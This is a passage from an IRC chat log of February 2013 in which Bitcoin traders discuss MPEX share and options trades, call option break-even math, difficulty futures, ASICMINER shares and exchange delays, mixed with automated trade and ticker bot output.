10 23:47:25 bwin n1 in EU Feb 10 23:47:42 treasury.gov Feb 10 23:48:13 actually i would guess that may be a decent way to earn a btc. Feb 10 23:48:35 yes if you know some people from honk hong Feb 10 23:48:45 8M euro Feb 10 23:48:46 honkies Feb 10 23:48:56 earning Feb 10 23:48:57 mircea, would be better with categories, would require op tho Feb 10 23:49:25 the cops here just stop a big mafia on football Feb 10 23:49:35 400 match Feb 10 23:49:48 it also looks bad when so many bets are for .01 btc Feb 10 23:49:49 It could automatically create a bet for each match in certain sports and automatically attribute the winnings Feb 10 23:50:09 need a bitbet "whale" Feb 10 23:50:15 or "fluffer" Feb 10 23:50:18 there's bets of 100s of btc Feb 10 23:50:28 buncha in the double digit range too Feb 10 23:50:33 i know, but many seem to be tiny Feb 10 23:50:37 well yeah Feb 10 23:50:43 nature of the beast i guess, most people bet small. Feb 10 23:51:01 but, see, .01 is a lot!! that 1 million satoshi Feb 10 23:51:02 and people would have categories such as NFL, NHL, etc Feb 10 23:51:06 i'm not complaining, just thinking about user perspective Feb 10 23:51:07 Namworld you could do it automatically, but i'd much rather people did it. Feb 10 23:51:34 def need better category filtering Feb 10 23:51:39 Seems like it would work better with categories and automated system Feb 10 23:52:29 prolly need better categories sure Feb 10 23:53:54 Might be a bit hard to find what you want otherwise Feb 10 23:54:27 [BTCTC] [MININGCO.ETF] 7 @ 0.56 = 3.92 BTC [+] Feb 10 23:55:04 tho the search works so in effect any word can be a category Feb 10 23:55:13 [BTCTC] [GSDPT] 42 @ 0.0064 = 0.2688 BTC [+] Feb 10 23:55:15 i bet against Mila Kunis winning FHM Feb 11 00:06:06 the green hurts Feb 11 00:10:13 [MPEX] [S.DICE] 1000 @ 0.00639999 = 6.4 BTC [-] Feb 11 00:10:19 [MPEX] [S.DICE] 3300 @ 0.0064 = 21.12 BTC [+] Feb 11 00:11:02 ;;ticker Feb 11 00:11:03 BTCUSD ticker | Best bid: 23.85001, Best ask: 23.89900, Bid-ask spread: 0.04899, Last trade: 23.85001, 24 hour volume: 53676.15792582, 24 hour low: 22.67000, 24 hour high: 23.99800, 24 hour vwap: 23.38993 Feb 11 00:11:08 ;;calc 23.38993 / 4 Feb 11 00:11:09 5.8474825 Feb 11 00:11:51 [MPEX] [S.MPOE] 1709 @ 0.00063466 = 1.0846 BTC [+] Feb 11 00:11:53 [MPEX] [S.MPOE] 4600 @ 0.00063534 = 2.9226 BTC [+] Feb 11 00:11:57 [MPEX] [S.MPOE] 7671 @ 0.00063578 = 4.8771 BTC [+] Feb 11 00:11:59 [MPEX] [S.MPOE] 4600 @ 0.00063701 = 2.9302 BTC [+] Feb 11 00:12:00 [MPEX] [S.MPOE] 820 @ 0.00063737 = 0.5226 BTC [+] Feb 11 00:17:43 [MPEX] [S.MPOE] 3441 @ 0.00062569 = 2.153 BTC [-] Feb 11 00:18:12 [BTCTC] [S.DICE-PT] 42 @ 0.0063 = 0.2646 BTC [+] Feb 11 00:19:28 [MPEX] [S.MPOE] 1065 @ 0.00062569 = 0.6664 BTC [-] Feb 11 00:19:30 [MPEX] [S.MPOE] 868 @ 0.00062314 = 0.5409 BTC [-] Feb 11 00:20:02 Still 4 BTC to be distributed on BTC-BOND, one per day, by the way Feb 11 00:21:12 [MPEX] [S.MPOE] 9132 @ 0.00062314 = 5.6905 BTC [-] Feb 11 00:21:13 [MPEX] [S.MPOE] 6168 @ 0.00062313 = 3.8435 BTC [-] Feb 11 00:22:09 not just s.bbet. s.dice looks silly now, too Feb 11 00:24:12 2444444444 Feb 11 00:25:45 ;;ticker Feb 11 00:25:46 BTCUSD ticker | Best bid: 23.81178, Best ask: 23.99894, Bid-ask spread: 0.18716, Last trade: 23.81178, 24 hour volume: 54088.59621120, 24 hour low: 22.67000, 24 hour high: 24.00000, 24 hour vwap: 23.39639 Feb 11 00:25:54 haha almost there. Feb 11 00:26:09 and calls STILL Aren't selling much. Feb 11 00:27:24 yeah Feb 11 00:27:34 I gotta price mine over yours for a bit Feb 11 00:27:38 [MPEX] [S.MPOE] 2382 @ 0.00062313 = 1.4843 BTC [-] Feb 11 00:27:43 don't want to sellf Feb 11 00:29:41 [BTCTC] [GSDPT] 1 @ 0.0064 BTC [+] Feb 11 00:30:21 Eventually, eventually. When I have the money Feb 11 00:31:34 [BTCTC] [S.DICE-PT] 1 @ 0.0063 BTC [+] Feb 11 00:32:14 [MPEX] [S.MPOE] 6490 @ 0.00062163 = 4.0344 BTC [-] Feb 11 00:32:40 i'd buy something like C200N but...0.43BTC? Feb 11 00:33:26 that expensive? Feb 11 00:34:01 ouchies Feb 11 00:34:14 yes. needs btcusd to go over 35 Feb 11 00:34:21 well, forward months are usually a little more Feb 11 00:34:27 *a little* Feb 11 00:34:34 heheh Feb 11 00:35:07 im sure it was cheaper two weeks ago, when the btcusd was still 15ish Feb 11 00:35:22 lol Feb 11 00:35:31 point taken Feb 11 00:36:05 24 Feb 11 00:36:31 ;;ticker Feb 11 00:36:32 BTCUSD ticker | Best bid: 23.98705, Best ask: 24.00000, Bid-ask spread: 0.01295, Last trade: 24.00000, 24 hour volume: 54422.54900535, 24 hour low: 22.67000, 24 hour high: 24.00000, 24 hour vwap: 23.40115 Feb 11 00:36:55 C300N turns profitable at btcusd=41.6 O.o Feb 11 00:37:23 could happen till end of march ? Feb 11 00:37:43 why C300N and C350N sell at the same price? Feb 11 00:38:46 the curve flattens the more otm they are Feb 11 00:39:12 because there's a standard minimum price and so far out of market price... Feb 11 00:39:19 well they're all at minimum price Feb 11 00:39:31 if there was no minimum, C350N would be cheaper I guess Feb 11 00:40:26 ;;calc 35/24 Feb 11 00:40:26 1.45833333333 Feb 11 00:40:50 far? it's only 46% over current price Feb 11 00:41:16 ;;ticker Feb 11 00:41:18 BTCUSD ticker | Best bid: 24.04004, Best ask: 24.04281, Bid-ask spread: 0.00277, Last trade: 24.04004, 24 hour volume: 54796.84225547, 24 hour low: 22.67000, 24 hour high: 24.04004, 24 hour vwap: 23.40587 Feb 11 00:41:22 BAM Feb 11 00:41:24 over 24 Feb 11 00:42:30 We're still going strong Feb 11 00:43:38 ;;asks 23.5 Feb 11 00:43:40 There are currently 0 bitcoins offered at or under 23.5 USD, worth 0.0 USD in total. Feb 11 00:43:43 ;;asks 24.5 Feb 11 00:43:45 There are currently 4618.2439 bitcoins offered at or under 24.5 USD, worth 112289.956161 USD in total. Feb 11 00:44:20 actually the calls out 6 weeks show LESS price variation than has happened the past 3 weeks Feb 11 00:44:23 [MPEX] [S.MPOE] 1300 @ 0.0006192 = 0.805 BTC [-] Feb 11 00:44:25 i'd say they're kinda cheap. Feb 11 00:45:19 why aren't you doing those things now Feb 11 00:45:22 lol Feb 11 00:45:22 lol Feb 11 00:45:23 lol Feb 11 00:45:31 lol, how many you got PsychoticBoy? Feb 11 00:45:47 haha... i consider half-retired since 29 (paid off my flat) and slowly getting there Feb 11 00:45:48 To stop everything at 35 per Feb 11 00:46:41 it's better to retire gradually than abruptly Feb 11 00:46:47 imho Feb 11 00:46:52 Well pirate was a bad idea Feb 11 00:47:53 greedy? Feb 11 00:49:16 um, still 2k ask wall at 24 at bitstamp.. anyone doing arb? Feb 11 00:49:31 I wish Feb 11 00:49:40 I got no convenient way to move fiat around Feb 11 00:50:33 got an idea wrt bitstamp and am pestering Ukto with it.. we'll see. but he's busy now with other things Feb 11 00:55:03 "And thanks for being pleasant, MPOE-PR." Feb 11 00:55:08 what are my eyes reading Feb 11 00:55:48 REDDDDD Feb 11 00:55:49 sarcasm? Feb 11 00:56:08 this is failure on a colossal scale! Feb 11 00:58:31 [MPEX] [S.MPOE] 6056 @ 0.0006192 = 3.7499 BTC [-] Feb 11 00:58:33 [MPEX] [S.MPOE] 5094 @ 0.00061882 = 3.1523 BTC [-] Feb 11 01:00:24 mircea_popescu: i think he meant peasant Feb 11 01:00:43 lol Feb 11 01:00:44 [MPEX] [S.MPOE] 3256 @ 0.00061882 = 2.0149 BTC [-] Feb 11 01:00:45 [MPEX] [S.MPOE] 8900 @ 0.00061876 = 5.507 BTC [-] Feb 11 01:00:50 [MPEX] [S.MPOE] 8812 @ 0.00061863 = 5.4514 BTC [-] Feb 11 01:01:12 OR Feb 11 01:01:14 he meant pheasant Feb 11 01:01:19 there's a lot possibilities Feb 11 01:02:47 !ticker m s.dice Feb 11 01:02:48 [MPEX:S.DICE] 1D: 0.00606903 / 0.00635803 / 0.0064 (34996 shares, 222.51 BTC), 7D: 0.0042 / 0.00574395 / 0.007395 (4398275 shares, 25,263.48 BTC), 30D: 0.00085848 / 0.00554145 / 0.0075 (8548901 shares, 47,373.31 BTC) Feb 11 01:03:17 [MPEX] [S.MPOE] 1000 @ 0.00061864 = 0.6186 BTC [+] Feb 11 01:03:19 [MPEX] [S.MPOE] 1188 @ 0.00061863 = 0.7349 BTC [-] Feb 11 01:03:21 [MPEX] [S.MPOE] 9200 @ 0.00061862 = 5.6913 BTC [-] Feb 11 01:03:40 [MPEX] [S.MPOE] 500 @ 0.00062163 = 0.3108 BTC [+] Feb 11 01:23:18 [MPEX] [S.MPOE] 6300 @ 0.00061862 = 3.8973 BTC [-] Feb 11 01:27:04 [MPEX] [S.MPOE] 8122 @ 0.00062163 = 5.0489 BTC [+] Feb 11 01:36:58 [MPEX] [S.MPOE] 3352 @ 0.00062399 = 2.0916 BTC [+] Feb 11 01:36:59 [MPEX] [S.MPOE] 1150 @ 0.00061862 = 0.7114 BTC [-] Feb 11 01:37:00 [MPEX] [S.MPOE] 9300 @ 0.00061858 = 5.7528 BTC [-] Feb 11 01:37:02 [MPEX] [S.MPOE] 6679 @ 0.00061796 = 4.1274 BTC [-] Feb 11 01:47:57 [BTCTC] [BASIC-MINING] 1 @ 0.3498 BTC [+] Feb 11 01:48:01 someone here sought for ripples? https://www.bitmit.net/en/item/15914-1000-xrp-ripples Feb 11 01:55:20 is that a new bottom for bitmit ? Feb 11 01:56:02 [BTCTC] [SYNERGY] 1 @ 0.1494 BTC [+] Feb 11 01:56:04 [BTCTC] [SYNERGY] 1 @ 0.1495 BTC [+] Feb 11 01:56:06 [BTCTC] [SYNERGY] 6 @ 0.1497 = 0.8982 BTC [+] Feb 11 01:56:07 [BTCTC] [SYNERGY] 5 @ 0.1498 = 0.749 BTC [+] Feb 11 01:56:13 [BTCTC] [SYNERGY] 8 @ 0.151 = 1.208 BTC [+] Feb 11 01:57:49 [MPEX] [S.MPOE] 21000 @ 0.00063334 = 13.3001 BTC [+] Feb 11 01:57:53 [MPEX] [S.MPOE] 800 @ 0.00063534 = 0.5083 BTC [+] Feb 11 02:01:33 It looks like no more bids on ASICMINER going to happen Feb 11 02:06:52 yah no shit Feb 11 02:07:00 shoulda taken the deal Feb 11 02:07:14 before market flooded Feb 11 02:07:48 ? Feb 11 02:08:01 are people still going to pay 0.41? Feb 11 02:08:20 Well I already got the bids Feb 11 02:08:33 There's a reason the forum doesn't allow post deletion Feb 11 02:08:41 do you think they will honor them now that there are 1000s of shares on market? Feb 11 02:09:01 All the shares on the market request 0.30 minimum... Feb 11 02:09:09 It was my actual reserve =/ Feb 11 02:09:22 Seems no one wants to sell under .3 Feb 11 02:09:45 it was a good idea to sell Feb 11 02:10:10 idk, maybe Feb 11 02:10:39 If friedcat keeps spamming more and more ASICs, could generate a lot in mining Feb 11 02:10:58 Although the profit from ASIC sales seems like the sweet deal. Feb 11 02:12:21 I'd like to have an idea of the power consumption and the cost to them to make boards Feb 11 02:16:50 [HAVELOCK] [KCIM] 1 @ 0.925 BTC [-] Feb 11 02:17:02 [MPEX] [O.BTCUSD.C230T] 915 @ 0.15315884 = 140.1403 BTC Feb 11 02:19:16 [MPEX] [S.MPOE] 2850 @ 0.00063379 = 1.8063 BTC [-] Feb 11 02:19:40 well Feb 11 02:19:45 there go some calls Feb 11 02:20:48 [MPEX] [S.MPOE] 10722 @ 0.00061922 = 6.6393 BTC [-] Feb 11 02:21:36 it can happen! Feb 11 02:21:38 you bought or sold? Feb 11 02:21:51 [BTCTC] [RSM] 50 @ 0.0099 = 0.495 BTC [+] Feb 11 02:22:01 By the look of it, it was an ask Feb 11 02:23:12 [MPEX] [S.MPOE] 11750 @ 0.00063379 = 7.447 BTC [+] Feb 11 02:23:13 [MPEX] [S.MPOE] 1550 @ 0.00063534 = 0.9848 BTC [+] Feb 11 02:23:23 someone hit MPs ask Feb 11 02:23:42 not yours then Feb 11 02:23:56 nope I am only buying into this shit Feb 11 02:24:09 IV is huge right now Feb 11 02:24:44 [MPEX] [S.MPOE] 15740 @ 0.00063534 = 10.0003 BTC [+] Feb 11 02:24:50 So, is it worth getting mpex if you only have around 100 BTC to play around? Feb 11 02:25:31 To me it's always worth it. Later, it will only cost more. Feb 11 02:26:07 The only thing I understand are the stocks, still clueless about options Feb 11 02:26:12 I think ~300BTC Feb 11 02:26:17 Bowjob in general after a few k worth of total trade it's worth it Feb 11 02:26:24 ah Feb 11 02:26:52 minus 5 btc or 10 if your referer is kind Feb 11 02:26:57 options straddle at 24 looks kinda juicy right now Feb 11 02:27:03 Also Feb 11 02:27:20 if you can do the sort of magic shit Bugpower does and extract 100% out of your btc in six weeks Feb 11 02:27:20 you may have more BTC in the future Feb 11 02:27:30 just wait Feb 11 02:27:30 then putting in 60 btc means you'll be whole by spring. Feb 11 02:27:38 till this OpEX Feb 11 02:27:41 :) Feb 11 02:27:48 hehehe Feb 11 02:27:55 yeah, I'm aware an mpex account could exceed the cost of a nyse seat Feb 11 02:27:57 ^ Feb 11 02:28:12 Bugpower ya, haven't seen the ponzigraph in a while Feb 11 02:28:33 Bug we started with the same capital.. what sort of voodoo are you doing? Feb 11 02:28:47 Luck Feb 11 02:28:55 he is stealing from the common man. Feb 11 02:28:56 I was lucky to buy in at 2.65 Feb 11 02:28:57 I'd get slaughtered right now if I jump in right now Feb 11 02:29:16 I was lucky to buy a shitload of calls before last opex Feb 11 02:29:25 then reverse postion at the top Feb 11 02:29:38 and that could backfire miserably, right? Feb 11 02:29:40 and I was REALLY lucky to buy calls when it was at 17 today Feb 11 02:29:46 not today Feb 11 02:29:49 early this month Feb 11 02:30:16 and i was STUPID to get partially flushed out on a brief dump on Monday? Feb 11 02:30:32 so ponzi power is not where I would like it to be. Feb 11 02:30:32 so how much are you ahead ? Feb 11 02:30:39 a call is like a guarantee to buy bitcoins at a specific price, you just gotta pay a premium for that guarantee right? Feb 11 02:30:43 from cost basis? Feb 11 02:30:56 sure. Feb 11 02:30:58 From Dec 2011, up around 3000% USD Feb 11 02:31:06 jolly. Feb 11 02:31:12 dare i ask if early or late dec ? Feb 11 02:31:18 they said it was for early adopters only Feb 11 02:31:19 Bowjob pretty much Feb 11 02:31:27 let me check Feb 11 02:32:57 Nov 29th Feb 11 02:33:11 I told my boss about bitcoin when they reached 31 USD Feb 11 02:33:25 we all know what happened there, good thing he didnt ask me the following days after Feb 11 02:33:31 >D Feb 11 02:33:34 *then Feb 11 02:33:57 I thought it was done for. then months later, I saw it at 10 dollars, then 11, then 12 Feb 11 02:34:29 I got some at 13.29, then it's all gravy train all the way to 24 Feb 11 02:34:49 when it hit $2 I knew it was time to buy Feb 11 02:35:04 I was lucky I didn't buy in the first bubble Feb 11 02:35:07 i think bitcoin pretty much is divided among they who loaded up under 4 and they who did not. Feb 11 02:35:18 wanted to buy at $7 on the first bubble Feb 11 02:35:20 Bugpower i bought my first batch, 60 bitcoins, at 16 each. Feb 11 02:35:23 heck when I logged in on my mt gox, I saw orders at 2 dollars Feb 11 02:35:25 but never got around to it Feb 11 02:35:26 lol i loaded at 5 Feb 11 02:35:30 recently, that went into green. took like 16 months. Feb 11 02:35:41 i happen to not care that going from 16 to 24 took 16 months Feb 11 02:35:54 jurov thus you fail. sorry! Feb 11 02:36:44 :P Feb 11 02:37:45 but i think mpex ipo participation got me back into game :DDD Feb 11 02:38:12 ehehe im sure it did, that. Feb 11 02:38:53 probably best investment in history of btc, esp for the people who got the shares at 2k satoshi Feb 11 02:39:12 I'll take some of that Feb 11 02:39:41 I keep hearing about interesting stuff late xP Feb 11 02:40:13 lol Feb 11 02:42:44 [MPEX] [S.MPOE] 7010 @ 0.00063534 = 4.4537 BTC [+] Feb 11 02:42:46 [MPEX] [S.MPOE] 13890 @ 0.0006354 = 8.8257 BTC [+] Feb 11 02:45:56 [BTCTC] [BTC-GOLD] 1 @ 0.0212 BTC [-] Feb 11 02:45:56 i just paid puny 1.55 btc for wordpress templates for quite sizable website Feb 11 02:46:07 realized how much it's wort now Feb 11 02:46:15 *worth Feb 11 02:46:38 i hope it wasn't wordpress.com? Feb 11 02:47:26 no, i ended up doing a site for nonprofit Feb 11 02:47:29 someone's asking for a 1000 BTC 'loan' with the title "Impossible to pay you back" Feb 11 02:47:51 and wamnted to use something mainstream so that any monkey can take it over Feb 11 02:48:21 Bowjob let me guess, btcjam ? Feb 11 02:48:31 Nope, bitcointalk Feb 11 02:48:46 not hyp enough for btcjam yet. Feb 11 02:48:48 I'm not sure if trolling, or serious or stupid or both Feb 11 02:49:04 erm, all three Feb 11 02:49:04 lol Feb 11 02:49:59 troth Feb 11 02:50:09 totally. i can see it Feb 11 02:50:24 "not sure if stupid, trolling, intoxicated or troth" Feb 11 02:53:14 he can provide bisness plan for serious enquiries Feb 11 02:53:16 [BTCTC] [GSDPT] 2 @ 0.0064 = 0.0128 BTC [+] Feb 11 02:53:41 f** my english haha Feb 11 02:54:14 error4733, but you imitated that style nicely Feb 11 02:54:50 no business plans provided. it's the same dude who asked for 1200 BTC loan, then 350-400 BTC, then 1000 BTC.. oh and it's the same guy who called in 23.99 as the top for 2013 Feb 11 02:55:06 I offered him the opportunity to short the coins, but declined. Feb 11 02:55:45 error4733 what is it? Feb 11 02:56:49 i'm not serious so idk Feb 11 03:00:22 ;;ticker Feb 11 03:00:23 BTCUSD ticker | Best bid: 23.91002, Best ask: 23.99997, Bid-ask spread: 0.08995, Last trade: 23.99998, 24 hour volume: 56718.38842089, 24 hour low: 22.67000, 24 hour high: 24.11000, 24 hour vwap: 23.42452 Feb 11 03:04:20 You know, the thread title might have been changed by a moderator... I could easily see that happening Feb 11 03:04:21 [BTCTC] [BTC-BOND] 3 @ 0.01 = 0.03 BTC [+] Feb 11 03:05:24 [MPEX] [S.MPOE] 7750 @ 0.00063207 = 4.8985 BTC [-] Feb 11 03:08:13 [BTCTC] [S.DICE-PT] 2 @ 0.0063 = 0.0126 BTC [+] Feb 11 03:11:18 aite well, take it ezzy all. **** BEGIN LOGGING AT Mon Feb 11 12:12:42 2013 Feb 11 12:12:59 [MPEX] [S.MPOE] 5829 @ 0.00062818 = 3.6617 BTC [-] Feb 11 12:13:01 [MPEX] [S.MPOE] 568 @ 0.00063224 = 0.3591 BTC [+] Feb 11 12:20:27 [MPEX] [S.MPOE] 30394 @ 0.00063224 = 19.2163 BTC [+] Feb 11 12:20:29 [MPEX] [S.MPOE] 8450 @ 0.0006345 = 5.3615 BTC [+] Feb 11 12:20:41 [MPEX] [S.MPOE] 6610 @ 0.00063676 = 4.209 BTC [+] Feb 11 12:20:43 [MPEX] [S.MPOE] 6950 @ 0.0006369 = 4.4265 BTC [+] Feb 11 12:20:44 [MPEX] [S.MPOE] 4609 @ 0.00063737 = 2.9376 BTC [+] Feb 11 12:23:56 [MPEX] [S.MPOE] 8200 @ 0.00062734 = 5.1442 BTC [-] Feb 11 12:24:08 ;;later tell evoorhees https://bitcointalk.org/index.php?topic=142395.msg1518588 that sounds like its worth looking into Feb 11 12:24:08 The operation succeeded. Feb 11 12:29:31 [MPEX] [S.MPOE] 2150 @ 0.00062734 = 1.3488 BTC [-] Feb 11 12:29:37 [MPEX] [S.MPOE] 9177 @ 0.00062729 = 5.7566 BTC [-] Feb 11 12:39:50 [MPEX] [S.MPOE] 13421 @ 0.00063737 = 8.5541 BTC [+] Feb 11 12:39:52 [MPEX] [S.MPOE] 3179 @ 0.00063801 = 2.0282 BTC [+] Feb 11 12:44:39 [MPEX] [S.MPOE] 1271 @ 0.00063801 = 0.8109 BTC [+] Feb 11 12:44:40 [MPEX] [S.MPOE] 10979 @ 0.00063804 = 7.005 BTC [+] Feb 11 12:48:36 ;;bc,tslb Feb 11 12:48:36 [MPEX] [S.MPOE] 2284 @ 0.00063804 = 1.4573 BTC [+] Feb 11 12:48:36 Time since last block: 50 minutes and 6 seconds Feb 11 12:48:37 [MPEX] [S.MPOE] 8366 @ 0.00063884 = 5.3445 BTC [+] Feb 11 12:49:27 anybody personally selling any assets? Feb 11 12:49:43 shares into asic rigs? avalons etc Feb 11 12:50:36 BitHub, aren't you interested in difficulty futures perhaps? Feb 11 12:51:40 jurov: how do you buy difficulty futures? Feb 11 12:51:58 i mostly issue them :) Feb 11 12:52:17 cool! i should get some Feb 11 12:52:25 https://bitfunder.com/asset/CoinBr.iDiff-E Feb 11 12:52:31 https://bitfunder.com/asset/CoinBr.iDiff-O Feb 11 12:52:41 can you explain what they are a bit more? Feb 11 12:52:44 sorry to be n00b Feb 11 12:53:01 1. you buy them on whatever price they're offered Feb 11 12:53:30 2. expiration date comes, it will be liquidated and you'll get back current difficulty in satoshi Feb 11 12:54:02 so if it goes up to 4 million, you'll get 0.04 BTC/share Feb 11 12:55:01 also shorting is posible if you expect difficulty to stagnate/go down Feb 11 12:55:04 where can i check the difficulty rating in real time? Feb 11 12:55:26 http://bitcoincharts.com/bitcoin/ Feb 11 12:55:30 ;;bc,diff Feb 11 12:55:30 3275464.5865656 Feb 11 12:55:34 ^ also Feb 11 12:55:49 ahh Feb 11 12:56:11 http://www.palookavillepost.com/2013/02/09/accused-gunman-christopher-dorner-issues-statement-its-not-me/ Feb 11 12:56:14 that's pretty sweet. Feb 11 12:56:29 BitHub i think namworld was selling asicminer shares Feb 11 12:56:31 but on auction Feb 11 12:56:46 [MPEX] [S.MPOE] 20650 @ 0.00063604 = 13.1342 BTC [-] Feb 11 12:57:04 i purchased some, got no idea if i own them or not tho Feb 11 12:57:38 what do you mean? Feb 11 12:57:59 it's more a contract, than something you own. Feb 11 12:58:29 the contract says i promise to pay you according to diffculty on a set date Feb 11 12:58:47 sorry that was directed at mircea Feb 11 12:59:04 ok :) Feb 11 12:59:25 so its like a bet? if you don't make that date you get nothing? Feb 11 12:59:26 jurov what does the O and E mean? Feb 11 12:59:40 -O odd months, -E even months settlement Feb 11 13:00:07 so after -E expires, i'll create new one for april with the same name Feb 11 13:00:11 [MPEX] [S.MPOE] 2500 @ 0.00063349 = 1.5837 BTC [-] Feb 11 13:00:32 would you buy some futures leo? Feb 11 13:03:48 i think so Feb 11 13:03:53 probably next months Feb 11 13:03:56 well, buy them only if you believe in asics Feb 11 13:03:59 BitHub sorry, purchased what ? Feb 11 13:04:09 i do believe in asics Feb 11 13:04:11 i'm selling them, nuff said Feb 11 13:04:21 i wear their socks and shoes too Feb 11 13:04:42 you're welcome ;) Feb 11 13:04:58 also Feb 11 13:05:20 asicminer shares Feb 11 13:05:50 [MPEX] [O.BTCUSD.C170T] 3 @ 0.33832578 = 1.015 BTC [+] Feb 11 13:06:19 BitHub the ownership of asicminer shares is a little iffy, because there's no exchange/clearinghouse atm Feb 11 13:06:38 if indeed their own system is ever deployed, and if indeed it actually works as expected, you probably have something Feb 11 13:06:49 probably Feb 11 13:06:56 or just got scammed Feb 11 13:07:10 i dunno what they're thinking, but anyway. Feb 11 13:07:53 i advise against it, based on their not exactly stellar performance with managing bitvps asset Feb 11 13:08:02 ;;bc,24hprc Feb 11 13:08:04 23.56 Feb 11 13:08:16 !ticker btct bitvps Feb 11 13:08:18 http://leotreasure.com/asics1.jpg http://leotreasure.com/asics2.jpg Feb 11 13:08:19 [BTCT:BITVPS] 1D: -- / -- / -- (0 shares, 0 BTC), 7D: -- / 0.0 / -- (0 shares, 0 BTC), 30D: -- / 0.0 / -- (0 shares, 0 BTC) Feb 11 13:08:29 ^ nice Feb 11 13:08:52 [MPEX] [S.DICE] 312 @ 0.00635294 = 1.9821 BTC [+] Feb 11 13:09:02 hi all Feb 11 13:09:11 lol zeitgeist Feb 11 13:09:13 'ello Feb 11 13:09:31 lmao bitcointalk noobs bitching at assbot's name Feb 11 13:09:39 how can these people be so boring and live ? Feb 11 13:09:49 lol leo Feb 11 13:10:05 :) Feb 11 13:10:12 they're coming march or april Feb 11 13:10:51 haha it's leotreasure's asic store Feb 11 13:11:14 so, i got the call with $17 strike expiring this month Feb 11 13:11:53 nice Feb 11 13:12:11 from what i've calculated going off the 24 hour volume-weighted cross-exchange ratio, that i am in the money above 24.97095538, is that true? Feb 11 13:13:26 i paid 0.33832578 Feb 11 13:14:21 just checking my math Feb 11 13:14:21 ;;calc (24.971-17)/24.971 Feb 11 13:14:21 0.319210283929 Feb 11 13:14:23 ;;calc 6/20 Feb 11 13:14:23 0.3 Feb 11 13:14:26 ;;calc 7/20 Feb 11 13:14:26 0.35 Feb 11 13:14:35 ya somewhere between 23 and 24 you're itm Feb 11 13:14:53 ow shit my bad Feb 11 13:14:54 ;;bc,24hprc Feb 11 13:14:55 23.56 Feb 11 13:14:55 jurov is right Feb 11 13:15:31 by the way, Jurov, coinbr has worked awesome, i have not had one problem so far Feb 11 13:15:38 which is more than i can say for coinbase Feb 11 13:16:27 glad to hear! Feb 11 13:16:56 maybe it/s time someone seeds jurov then Feb 11 13:17:00 ;;calc 17/(1-0.33) Feb 11 13:17:00 25.3731343284 Feb 11 13:17:07 yeah, i agree Feb 11 13:17:13 ^ your break even point Feb 11 13:17:26 ;;calc 17/(1-0.3383) Feb 11 13:17:27 25.691400937 Feb 11 13:17:33 more precisely Feb 11 13:17:43 mjr_ eyah, save that formula somewhere. strike - (1 / what you paid) = break even point Feb 11 13:17:46 ah, you use the current trading price instead of the 24 hour cross-exchange average? Feb 11 13:18:18 no, mpoe settles on the 24 hour vwap Feb 11 13:18:55 ;;bc,24hprc Feb 11 13:18:56 23.56 Feb 11 13:19:02 anyway, looks like i'm going to be fully self-sufficient capital-wise, no need for seeding Feb 11 13:19:06 is that the vwap? Feb 11 13:19:36 i'm rather on lookout for people who can get things done and can develop/manage non-core areas such as charts Feb 11 13:19:58 http://polimedia.us/dtng/c/src/136058158521.jpg speraking of professional Feb 11 13:20:08 mjr_ yes indeed it is. Feb 11 13:20:43 so...just to see if i understand this right... Feb 11 13:21:45 what i paid is (0.33832578*23.56) + the strike of 17 = 24.97095538 Feb 11 13:22:00 nah. Feb 11 13:22:08 o you mean in dollars ? Feb 11 13:22:11 yes Feb 11 13:22:13 or what do you mean Feb 11 13:22:26 in dollars you paid 0.33832578 * whatever price was then Feb 11 13:22:36 ah ok Feb 11 13:22:41 cause you did pay then Feb 11 13:22:44 that is why it is a little higher than that number Feb 11 13:22:53 so yes, if you do fiat accoubnting your breakeven is much lower than if you do btc accounting Feb 11 13:22:54 it's fine either way Feb 11 13:23:13 say you buy calls strike 10 when btc is 20 for .7 Feb 11 13:23:19 cost you 200 dollars Feb 11 13:23:26 if btc goes to 25 Feb 11 13:23:26 either way, i just want to be able to watch the price climb without being mad that i can't get in till friday Feb 11 13:24:07 hehe yeah. alternatively you can sell puts Feb 11 13:24:17 that's much higher risk Feb 11 13:24:25 true, but no capital for collateral Feb 11 13:24:34 and yeah, i like calls Feb 11 13:24:46 once i have a large position, i may think about buying puts Feb 11 13:24:48 calls are like, high chance of low loss, small chance of huge win Feb 11 13:24:50 [MPEX] [S.MPOE] 450 @ 0.00063349 = 0.2851 BTC [-] Feb 11 13:24:57 short puts are like, equal chances of win/loss Feb 11 13:24:57 yes exactly Feb 11 13:25:21 hey, the pope is resigning Feb 11 13:25:24 i like small definite cost, big (unlimited) payoff Feb 11 13:25:48 and also, psychologically, i will now be happy if they shoot up to $30 Feb 11 13:25:54 or 50 lol Feb 11 13:25:59 yeah true Feb 11 13:26:17 frustrating to not be able to get cash in there already Feb 11 13:26:24 speaking of which Feb 11 13:26:29 what do you think of camp bx? Feb 11 13:27:02 had horrible experience buying through coinbase, i just got the 1 btc i ordered on feb 2nd today Feb 11 13:27:17 good online wallet, bad exchange so far as i can see Feb 11 13:27:33 [MPEX] [S.MPOE] 8584 @ 0.00063884 = 5.4838 BTC [+] Feb 11 13:27:35 [MPEX] [S.MPOE] 6700 @ 0.00063899 = 4.2812 BTC [+] Feb 11 13:27:37 [MPEX] [S.MPOE] 9416 @ 0.00063973 = 6.0237 BTC [+] Feb 11 13:27:55 mjr_ you might try bitcoin-central Feb 11 13:28:06 a wait, you're in the us huh ? Feb 11 13:28:55 [MPEX] [S.MPOE] 500 @ 0.00063973 = 0.3199 BTC [+] Feb 11 13:29:18 yeah Feb 11 13:29:21 it sucks Feb 11 13:29:37 i will try bitcoin local first, or maybe reach out to some friends in nyc Feb 11 13:29:45 i can't deal with the huge wait times Feb 11 13:29:48 not being in the sepa zone is pretty sucky. Feb 11 13:29:57 yurpeans get same day service with the frenchie folks. Feb 11 13:30:03 yeah Feb 11 13:30:11 coinbase takes 4 days i think Feb 11 13:30:16 for the transfer to go through Feb 11 13:30:34 bitfloor is supposed to have like same day transfer from online banking Feb 11 13:30:54 since they have an ING direct checking, if you have one, you can move money to their account same day Feb 11 13:31:17 the last assbot message was my order going through :) Feb 11 13:31:27 hehe cool. Feb 11 13:31:54 mjr_ why so rushed? yo could have placed limit order at lower price Feb 11 13:32:19 [MPEX] [S.DICE] 50 @ 0.00635294 = 0.3176 BTC [+] Feb 11 13:32:25 that way i bought 40BTC worth of s.mpoe below 0.00062 this night Feb 11 13:34:12 [MPEX] [S.MPOE] 9234 @ 0.00063973 = 5.9073 BTC [+] Feb 11 13:34:14 [MPEX] [S.MPOE] 1866 @ 0.00064045 = 1.1951 BTC [+] Feb 11 13:35:25 options expire almost a week before month end this month Feb 11 13:36:26 well, it's last friday midnight Feb 11 13:36:52 not exactly the 